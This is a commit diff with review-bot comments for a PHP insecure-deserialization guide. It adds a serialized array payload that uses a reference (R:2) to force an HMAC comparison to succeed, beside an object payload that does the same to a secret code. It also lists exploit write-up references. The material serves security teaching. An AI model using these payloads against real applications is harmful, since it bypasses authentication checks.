Update PHP.md
parent
0a01854a6a
commit
992732877f
|
@ -111,6 +111,12 @@ Payload:
|
|||
O:6:"Object":2:{s:10:"secretCode";N;s:4:"guess";R:2;}
|
||||
```
|
||||
|
||||
We can do an array to like this:
|
||||
|
||||
```php
|
||||
a:2:{s:10:"admin_hash";N;s:4:"hmac";R:2;}
|
||||
```
|
||||
|
||||
## Finding and using gadgets
|
||||
|
||||
Also called "PHP POP Chains", they can be used to gain RCE on the system.
|
||||
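Review bot: The added sentence "We can do an array to like this:" has a typo ("to" should be "too") and does not say why the array payload works. Suggest stating that `R:2` is a reference to the second serialized value, so `hmac` ends up pointing at the same value as `admin_hash` and any comparison between the two succeeds, the same way `guess` references `secretCode` in the object payload just above. The new fence is also tagged `php` although its content is a serialized string rather than PHP source; an untagged fence or a `text` tag would be more accurate.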
|
@ -193,4 +199,4 @@ $poc->stopBuffering();
|
|||
* [Jack The Ripper Web challeneg Write-up from ECSC 2019 Quals Team France by Rawsec](https://rawsec.ml/en/ecsc-2019-quals-write-ups/#164-Jack-The-Ripper-Web)
|
||||
* [Rusty Joomla RCE Unserialize overflow](https://blog.hacktivesecurity.com/index.php?controller=post&action=view&id_post=41)
|
||||
* [PHP Pop Chains - Achieving RCE with POP chain exploits. - Vickie Li - September 3, 2020](https://vkili.github.io/blog/insecure%20deserialization/pop-chains/)
|
||||
* [How to exploit the PHAR Deserialization Vulnerability - Alexandru Postolache - May 29, 2020](https://pentest-tools.com/blog/exploit-phar-deserialization-vulnerability/)
|
||||
* [How to exploit the PHAR Deserialization Vulnerability - Alexandru Postolache - May 29, 2020](https://pentest-tools.com/blog/exploit-phar-deserialization-vulnerability/)
|
||||
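Review bot: The last reference entry ("How to exploit the PHAR Deserialization Vulnerability") appears twice in this hunk with identical visible text, and the header counts 4 lines on each side, so the only change here looks like trailing whitespace or the end-of-file newline. If that is intentional, it would be better as a separate commit or at least mentioned in the commit message; if not, drop it from this change. Since the reference list is being touched anyway, the "challeneg" typo in the first entry of this hunk could be corrected to "challenge".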